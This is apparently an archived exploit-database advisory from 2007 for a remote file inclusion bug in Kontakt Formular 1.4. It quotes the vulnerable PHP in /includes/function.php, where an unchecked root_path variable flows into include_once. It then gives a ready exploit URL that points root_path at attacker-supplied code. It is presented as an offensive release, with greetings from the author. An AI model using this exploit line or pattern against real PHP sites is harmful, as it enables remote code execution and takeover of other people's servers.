[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Kontakt Formular 1.4 Remote File Inclusion Vulnerability
# Published : 2007-12-30
# Author : bd0rk
# Previous Title : CMS Made Simple <= 1.2.2 (TinyMCE module) SQL Injection Vuln
# Next Title : Mihalism Multi Host 2.0.7 download.php Remote File Disclosure Vuln
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Kontakt Formular 1.4 Remote File Inclusion Vulnerability +
+ +
+ Discovered by bd0rk +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vendor: http://www.mapos-scripts.de
Download: http://www.mapos-scripts.de/download,5.html
Vulnerable Code in /includes/function.php
-------------------------------------------------------------------
<?php
@session_start();
$datei_path = $datei_path ? $datei_path : $root_path."/index.php";
$datei_path = htmlentities($datei_path);
$kontakt_config=array();
include_once($root_path.'/includes/config.php');
-------------------------------------------------------------------
[+]Exploit: http://[target]/[path]/includes/function.php?root_path=[Shellcode]
Greetings: str0ke, TheJT, Luna-Tic, DNX
####The 19 years old german Hacker bd0rk####
Contact: bd0rk[at]hackermail.com
# www.Syue.com [2007-12-30]